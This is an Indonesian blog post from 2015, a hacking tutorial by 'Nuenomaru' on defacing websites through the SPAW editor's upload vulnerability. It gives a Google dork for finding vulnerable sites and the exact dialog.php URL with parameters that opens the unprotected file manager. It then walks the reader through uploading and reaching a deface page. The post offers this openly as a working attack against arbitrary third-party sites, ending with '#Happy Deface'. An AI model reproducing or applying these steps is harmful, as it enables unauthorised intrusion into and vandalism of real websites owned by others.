Saturday, 23 May 2015

Tutorial Deface Dengan Metode Spaw Uploads

Halo selamat pagi sobat.
Kali ini Saya Nuenomaru akan menjelaskan dan mempraktekan Tutorial Deface Website Melalui Spaw Uploads Vulnerability.

Langsung aja yo:

1. Dork:
inurl:”spaw2/uploads/files/”


Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p


Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. jadi begini: inurl:”spaw2/uploads/files/” site:th

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

 3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

sehingga menjadi seperti ini


http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file 

4. nanti page web target anda akan menjadi seperti gambar dibawah ini :





Jika sudah Klik Upload.
Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.



Tinggal Klik File sobat ~> Nanti akan muncul semacam info file ~> lalu Klik Download file ~> nanti akan muncul halaman Deface sobat

Done :p



Sekian tutorial sederhana untuk hari ini dari saya >.<
Mohon maaf bila ada salah kata / teknis ;)

Semoga bermanfaat.
#Happy Deface gan :v


./Nuenomaru


Nuenomaru just an illusion in Cyber World




Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2



EmoticonEmoticon